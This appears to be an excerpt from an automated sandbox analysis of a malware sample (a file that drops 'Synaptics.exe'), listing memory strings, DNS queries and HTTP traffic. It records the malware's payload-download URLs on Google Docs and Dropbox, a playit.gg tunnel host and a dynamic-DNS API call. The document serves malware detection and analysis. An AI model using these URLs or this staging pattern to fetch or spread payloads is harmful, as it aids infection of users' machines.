            Source: Synaptics.exe, 00000014.00000000.445482616.0000000001344000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.438951576.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
            Source: Synaptics.exe, 00000014.00000000.431941807.0000000001373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/7
            Source: Synaptics.exe, 00000014.00000000.431941807.0000000001373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/7A8
            Source: Synaptics.exe, 00000014.00000002.529402333.0000000007916000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/w
            Source: Synaptics.exe, 00000014.00000000.445482616.0000000001344000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.438951576.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
            Source: Synaptics.exe, 00000014.00000000.445482616.0000000001344000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.goo
            Source: Synaptics.exe, 00000014.00000000.448364389.0000000008ECE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.goog
            Source: Synaptics.exe, 00000014.00000002.527672867.000000000131A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.447489062.00000000079A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
            Source: Synaptics.exe, 00000014.00000000.447489062.00000000079A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/S
            Source: y8kdmHi6x3.exe, 00000004.00000003.328489668.0000000003030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
            Source: Synaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
            Source: Synaptics.exe, 00000014.00000002.527933860.0000000002E10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
            Source: WINDOWS.EXE, 00000009.00000003.336747478.00000000022F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlop
            Source: Synaptics.exe, 00000014.00000000.446360400.0000000006DFD000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.531566369.000000000950E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.433312249.000000000717D000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.448502612.00000000093CE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.531400258.000000000900E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.433243588.000000000703D000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.531929602.0000000009D4E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.531339154.0000000008D8E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.531642477.000000000978E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.440101952.0000000008AFE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&expo
            Source: Synaptics.exe, 00000014.00000000.448472655.000000000928E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.448435227.000000000914E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.531299488.0000000008C4E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.448937298.0000000009C0E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.448040198.00000000084FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.448191184.000000000877E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.531838895.0000000009ACE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.448565852.000000000964E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.432142261.000000000353D000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.439872700.000000000863E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.440050531.00000000089BE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=d
            Source: WINDOWS.EXE, 00000009.00000003.336747478.00000000022F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
            Source: Synaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.438951576.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
            Source: Synaptics.exe, 00000014.00000000.445482616.0000000001344000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(
            Source: Synaptics.exe, 00000014.00000002.527672867.000000000131A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(o2
            Source: Synaptics.exe, 00000014.00000000.445482616.0000000001344000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/c
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0v
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0x
            Source: Synaptics.exe, 00000014.00000000.438951576.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download12
            Source: Synaptics.exe, 00000014.00000002.527672867.000000000131A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
            Source: Synaptics.exe, 00000014.00000000.431941807.0000000001373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
            Source: Synaptics.exe, 00000014.00000000.445482616.0000000001344000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.527570253.00000000012C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCo
            Source: Synaptics.exe, 00000014.00000000.445482616.0000000001344000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
            Source: Synaptics.exe, 00000014.00000000.445482616.0000000001344000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.438951576.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI
            Source: Synaptics.exe, 00000014.00000002.527933860.0000000002E10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
            Source: Synaptics.exe, 00000014.00000000.431941807.0000000001373000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN
            Source: Synaptics.exe, 00000014.00000000.431941807.0000000001373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
            Source: Synaptics.exe, 00000014.00000000.431941807.0000000001373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.527570253.00000000012C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
            Source: Synaptics.exe, 00000014.00000000.445482616.0000000001344000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.445482616.0000000001344000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
            Source: Synaptics.exe, 00000014.00000000.431941807.0000000001373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd
            Source: Synaptics.exe, 00000014.00000002.527570253.00000000012C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
            Source: Synaptics.exe, 00000014.00000002.527672867.000000000131A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeF
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
            Source: Synaptics.exe, 00000014.00000002.527570253.00000000012C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgh
            Source: Synaptics.exe, 00000014.00000000.431941807.0000000001373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
            Source: Synaptics.exe, 00000014.00000000.438951576.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpv
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpx
            Source: Synaptics.exe, 00000014.00000000.431941807.0000000001373000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.445482616.0000000001344000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt.be
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtoN
            Source: Synaptics.exe, 00000014.00000000.445482616.0000000001344000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
            Source: Synaptics.exe, 00000014.00000000.431941807.0000000001373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.438951576.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
            Source: Synaptics.exe, 00000014.00000000.438951576.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzC
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.445482616.0000000001344000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzQ
            Source: Synaptics.exe, 00000014.00000000.431941807.0000000001373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
            Source: Synaptics.exe, 00000014.00000002.527672867.000000000131A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~S
            Source: y8kdmHi6x3.exe, 00000004.00000003.328489668.0000000003030000.00000004.00000800.00020000.00000000.sdmp, WINDOWS.EXE, 00000009.00000003.336747478.00000000022F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
            Source: y8kdmHi6x3.exe, 00000004.00000003.328489668.0000000003030000.00000004.00000800.00020000.00000000.sdmp, WINDOWS.EXE, 00000009.00000003.336747478.00000000022F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
            Source: Synaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
            Source: Synaptics.exe, 00000014.00000002.527933860.0000000002E10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
            Source: WINDOWS.EXE, 00000009.00000003.336747478.00000000022F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=
            Source: Synaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
            Source: Synaptics.exe, 00000014.00000002.527933860.0000000002E10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
            Source: y8kdmHi6x3.exe, 00000004.00000003.328489668.0000000003030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=8
            Source: WINDOWS.EXE, 00000009.00000003.336747478.00000000022F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl
            Source: Synaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
            Source: Synaptics.exe, 00000014.00000002.527933860.0000000002E10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
            Source: Synaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
            Source: Synaptics.exe, 00000014.00000002.527933860.0000000002E10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:
            Source: unknownDNS traffic detected: queries for: agonizing-bat.auto.playit.gg
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_00474D50 InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,4_2_00474D50
            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'nonce-h8PmNUY3Lxp2hZQHX+d9yQ' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"Date: Wed, 26 Jan 2022 01:40:42 GMTExpires: Wed, 26 Jan 2022 01:40:42 GMTCache-Control: private, max-age=0X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockServer: GSESet-Cookie: NID=511=SSVn4-j59JXsTzxw847lfqJIID7zKof-Xkcxy3fnYPbOQF2K_rhItUDKpUam4CimsZa0ZkCNsNF-p5jihI9D9v5_JpNDmEeXc8nvpPuWdC1Y-5-xdpfIrOe7Xgo8_7k6NVyKXkeYW_T_LgorYz9SrXu0RFiFNl_tuUgPHfJZcdM; expires=Thu, 28-Jul-2022 01:40:41 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-EncodingConnection: closeTransfer-Encoding: chunked
